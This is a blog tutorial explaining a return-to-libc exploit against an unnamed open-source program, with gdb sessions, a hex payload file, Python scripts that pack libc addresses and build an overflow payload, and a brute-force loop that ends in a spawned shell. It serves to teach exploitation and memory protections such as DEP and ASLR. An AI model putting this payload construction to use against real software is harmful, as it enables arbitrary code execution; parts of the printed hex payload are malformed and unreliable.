Return-to-libc Exploit

Feb 11, 2019

In the previous post, we looked at a basic yet widespread vulnerability: integer overflow. We got a feel for how dangerous such simple programming mistakes can be and how cyber-criminals WILL use them to their advantage. In this post, we’ll look at another clever exploit called return-to-libc.

Note:

I assume that you have a basic knowledge of gdb and the structure of a process stack.
Example exploits are based on a 32-bit system.

Birth of Return-to-libc

Return-to-libc is an exploit technique that defeats Data Execution Prevention (DEP), a memory protection scheme that operating systems added to counter shellcode injection.

In a classic shellcode injection attack, an attacker overflows a buffer on the process stack with a NOP sled and a payload, overwriting the function's return address so that it points somewhere into the NOP sled. When the function returns, the CPU slides down the sled into the payload and executes it.

A computer is just a dumb machine which will do whatever we tell it to do. In this case, the return address has been overwritten to point to malicious code but the computer does not care. It begins executing instructions present at that address — the attacker’s malicious code — and then… well, the attacker will likely have full control of the system. Usually, an attacker places shellcode that spawns the system shell.

The buffer overflow and the resulting arbitrary code execution both occur on the process stack. DEP prevents this by marking the stack (and other data regions) as non-executable. Simple enough? Well, it IS simple, but not sufficient to stop an attacker.

A return-to-libc exploit also begins with a buffer overflow but uses code that is already visible to the target program, like the C standard library functions in libc. Unlike a typical shellcode injection attack, the injected payload in a return-to-libc attack does not contain code for spawning a system shell. Instead, the exploit needs the memory addresses of system() and of the string "/bin/sh" (also a part of libc). The overwritten return address sends execution to system() (not back into the injected bytes), with the address of "/bin/sh" placed on the stack as its argument, and that call spawns a shell.

Preparation for Exploit

Finding a Vulnerable System

The program I’ve chosen to exploit is an open-source system, and obviously I cannot say which. How did I come across the vulnerability? I fuzzed, and fuzzed, and fuzzed some more. If you don’t know how to fuzz, read my post on Fuzzing with AFL.

Disable ASLR

Address Space Layout Randomization (ASLR) is another memory protection technique. It counters return-to-libc type exploits by randomizing where the stack and libraries such as libc are loaded. Since this post is dedicated to return-to-libc, we’ll have to disable ASLR. Of course, there are ways to get around ASLR as well, brute force for one. Another recent vulnerability that bypasses ASLR is BranchScope. Magnificent!

kr@k3n@ubuntu:~/target$ cat /proc/sys/kernel/randomize_va_space
2
kr@k3n@ubuntu:~/target$ echo "0" | sudo dd of=/proc/sys/kernel/randomize_va_space
0+1 records in
0+1 records out
2 bytes copied, 0.000160017 s, 12.5 kB/s
kr@k3n@ubuntu:~/target$ cat /proc/sys/kernel/randomize_va_space
0
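
If you'd rather check the setting from a script, here is a minimal Python sketch. The function name describe_aslr is my own, and the labels paraphrase the three values the Linux kernel documents for randomize_va_space.

```python
from pathlib import Path

# Meanings of the values documented for kernel.randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "partial (stack, mmap base, and VDSO page randomized)",
    2: "full (partial, plus heap/brk randomization)",
}


def describe_aslr(raw: str) -> str:
    """Translate the contents of randomize_va_space into a readable label."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown value {value}")


if __name__ == "__main__":
    path = Path("/proc/sys/kernel/randomize_va_space")  # Linux only
    if path.exists():
        print("ASLR:", describe_aslr(path.read_text()))
    else:
        print("randomize_va_space not found (not a Linux system?)")
```

Writing 0 with dd, as above, lasts only until the next reboot, so re-run the check after restarting the machine.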

Compiler Flags

We will have to compile the target application with the -fno-stack-protector flag to enable our exploit. In some Linux distributions, gcc has Stack Protector turned on by default. This protection feature can detect stack buffer overflows (or stack smashing) and crash the program. Other Linux distributions have this scheme turned off by default; there, it can be enabled by compiling with -fstack-protector. For more information on this flag, refer to this Stack Overflow Answer.

If you’re wondering how effective this exploit is when we’ve already disabled two existing memory protection schemes, you’re right to wonder. But keep in mind that this exploit technique is more than a decade old. In fact, ASLR was developed in response to these types of exploits!

Time to Exploit!

I’ll be using gdb as my debugger of choice. You're free to use any debugger according to your comfort level.

Return Address, wh’re art thee?

The saved return address is stored 4 bytes above the address held in the frame pointer (%ebp). So, I'll place a breakpoint at a line where I can read %ebp. Obviously, this line is inside the function which contains the buffer we'll overflow.

kr@k3n@ubuntu:~/target$ gdb -q target
Reading symbols from target…done.
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) b sample_file.c:174
Breakpoint 1 at 0x804c83f: file sample_file.c, line 174.
(gdb) r crash_input.bin
Starting program: /home/kr@k3n/target/target crash_input.bin
Breakpoint 1, vuln_function (self=0xbfffeaa8, some_var=34) at sample_file.c:174
174 buffer[length++] = some_other_var;
(gdb) print $ebp
$1 = (void *) 0xbfffe9f8

Notice that I’ve executed two unset env commands. gdb sets the environment variables LINES and COLUMNS, which do not exist when the program runs outside gdb. Because environment variables live on the stack, they shift the stack addresses, and an exploit built from those addresses would work only inside gdb and not outside it.

So, %ebp is at 0xbfffe9f8. The return address must be located at 0xbfffe9fc.

(gdb) x/xw 0xbfffe9fc
0xbfffe9fc: 0x0804d633

Length of NOP Sled

The NOP sled stretches from the start of the buffer up to the saved %ebp, which sits just below the return address. Note that any filler byte can be used here instead of NOPs, because in a return-to-libc attack execution never returns to the buffer. NOPs matter in shellcode injection, where control returns into the sled and the CPU slides all the way to the shellcode.

Where is our buffer?

(gdb) print &buf
$2 = (char (*)[128]) 0xbfffe968

How many NOPs do we need?

(gdb) print 0xbfffe9f8 - 0xbfffe968
$3 = 144
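
Here is the same arithmetic in Python, as a quick sanity check. The addresses are copied from the gdb session above and the variable names are my own. Note that 144 bytes reach the saved %ebp, and four more reach the return address itself.

```python
# Addresses copied from the gdb session (32-bit target, ASLR disabled).
EBP = 0xBFFFE9F8   # value of $ebp inside vuln_function
BUF = 0xBFFFE968   # address printed by `print &buf`
WORD = 4           # pointer size on a 32-bit system

ret_addr_slot = EBP + WORD          # return address sits just above the saved %ebp
bytes_to_saved_ebp = EBP - BUF      # filler needed to reach the saved %ebp
bytes_to_ret_addr = ret_addr_slot - BUF

print(hex(ret_addr_slot))    # 0xbfffe9fc
print(bytes_to_saved_ebp)    # 144
print(bytes_to_ret_addr)     # 148
```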

Finding the address of system()

The target program that I’ve chosen doesn’t explicitly use system(), so its address cannot be found using print 'system@plt'. (I'll write about the PLT, the Procedure Linkage Table, and the GOT, the Global Offset Table, in the coming posts.) We'll have to print the address of system() at run-time.

(gdb) print system
$4 = {} 0xb7deeda0

Finding the address of “/bin/sh”

(gdb) find 0xb7deeda0, +999999999, "/bin/sh"
0xb7f0fa0b
warning: Unable to access 16000 bytes of target memory at 0xb7fbb813, halting search.
1 pattern found.

Shellcode Construction

The shellcode that I had to construct for my target is a little complicated because of certain “lucky” restrictions in the program implementation. Here’s the shellcode that I had to use:

kr@k3n@ubuntu:~/target$ cat crash_input.bin
“\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x94\xa0\xed\xde\xb7\x68\xea\xff\xbf\x0b\xfa\xf0\xb7\xzz

NOPs Length Mismatch

The above shellcode contains 128 NOPs. Certain program implementation restrictions led to the placement of \x94, which in turn caused the rest of the NOPs to be skipped. If these restrictions were not present, there would be 144 NOPs.

Placement of system() and “/bin/sh”

When system() starts executing, it expects the top of the stack to hold its return address, with its argument in the slot just above.

(Higher addresses are at the top in the stack layout below.)

| "/bin/sh"      | 0xb7f0fa0b |
| return address | 0xbfffea68 |

The system I’m working on uses little-endian byte order. So, when inserting the shellcode in memory, the bytes of each address have to be written in reverse order. I was restricted to using this particular value as the return address. You (hopefully) don’t have to.
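
The byte reversal is easy to get wrong by hand, so here is a small sketch that does it with Python's struct module. The helper name p32 is my own. The two addresses are the ones found with gdb earlier, and the output matches the corresponding bytes in the input file shown above.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", value)


SYSTEM_ADDR = 0xB7DEEDA0   # from `print system`
BINSH_ADDR = 0xB7F0FA0B    # from the `find` command

print(p32(SYSTEM_ADDR).hex())  # a0eddeb7
print(p32(BINSH_ADDR).hex())   # 0bfaf0b7
```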

Restriction-related hex code used

The hex codes \x94, \xbf\xff\xea\x68, and \xzz were placed because of the program implementation restrictions. They are completely unrelated to the principle of the return-to-libc exploit. You don't have to worry about them; you can replace them with random hex codes.
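
For comparison, here is a sketch of what the payload would look like without those restrictions. This is NOT the input I used. It assumes a plain linear overflow with nothing between the buffer and the saved return address that needs preserving. The function name build_payload and the placeholder return address 0x41414141 are my own choices for illustration.

```python
import struct


def p32(value: int) -> bytes:
    """Pack a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", value)


def build_payload(offset_to_ret: int, system_addr: int, binsh_addr: int,
                  fake_ret: int = 0x41414141, filler: bytes = b"\x90") -> bytes:
    """Lay out: filler | &system | return address for system() | &"/bin/sh"."""
    if len(filler) != 1:
        raise ValueError("filler must be a single byte")
    return (filler * offset_to_ret      # overwrites the buffer and the saved %ebp
            + p32(system_addr)          # replaces the saved return address
            + p32(fake_ret)             # where system() returns to afterwards
            + p32(binsh_addr))          # first argument of system()


# 148 = distance from the buffer to the return address in my gdb session.
payload = build_payload(148, 0xB7DEEDA0, 0xB7F0FA0B)
print(len(payload))  # 160
```

With a junk value such as 0x41414141 as the return address, the program will most likely crash once the shell exits. Putting the address of exit() there instead is a common way to make it quit cleanly.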

Get that Shell!

The hard-coded value in my shellcode, 0xbfffea68, changes every time the program is run. Fortunately, only the Least Significant Byte (LSB) varied. So, I wrote a script that runs the target program once for each value between 0xbfffea00 and 0xbfffeaff, patching that value into the shellcode each time: brute force, in other words.

kr@k3n@ubuntu:~/target$ python3 addr.py
Trying: \x00
Segmentation fault (core dumped)
35584
Trying: \x01
Segmentation fault (core dumped)
35584
…
…
Segmentation fault (core dumped)
35584
Trying: \x78
$ whoami
kr@k3n
$
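
I haven't included addr.py itself, but the idea can be sketched as below. Treat this as an illustration, not my actual script: the function names are made up, and build_input is a deliberately incomplete stand-in, because the real input file also needs the filler and the system() and "/bin/sh" addresses around the guessed value.

```python
import struct
import subprocess
import sys


def candidate_addresses(base: int = 0xBFFFEA00):
    """Yield the 256 addresses that differ from `base` only in the lowest byte."""
    for low_byte in range(0x100):
        yield (base & 0xFFFFFF00) | low_byte


def build_input(address: int) -> bytes:
    """Hypothetical stand-in: packs only the guessed address (little-endian)."""
    return struct.pack("<I", address)


def brute_force(target: str, input_path: str) -> None:
    """Run the target once per candidate; a shell prompt signals success."""
    for address in candidate_addresses():
        with open(input_path, "wb") as handle:
            handle.write(build_input(address))
        print(f"Trying: \\x{address & 0xFF:02x}")
        # stdin/stdout are inherited, so a spawned shell stays interactive.
        result = subprocess.run([target, input_path])
        print(result.returncode)


if __name__ == "__main__":
    # Usage (paths are placeholders): python3 sketch.py ./target crash_input.bin
    if len(sys.argv) == 3:
        brute_force(sys.argv[1], sys.argv[2])
```

The loop does not try to detect success automatically, since the target may still crash after the shell exits. You simply watch for the prompt.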

There’s the shell we wanted! But this is just step one. An attacker’s next step would be to get a root shell, which is beyond the scope of this post. Also, notice that the hard-coded byte that worked in the actual exploit (\x78) differs from the one used in the earlier sections (\x68).

If the target program runs with root privileges, then we make it very easy for the attacker to get root privileges. Although spawning the shell using "/bin/sh" drops privileges, using "/bin/sh -p" does not, so be very careful about which programs run with root privileges on your system. Their number is best kept to a minimum.

Done!

That’s it for this topic! Unfortunately, I couldn’t provide a simpler example (other than the generic ones) but this is what cybersecurity is all about! Adapting, hacking and patching!

Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!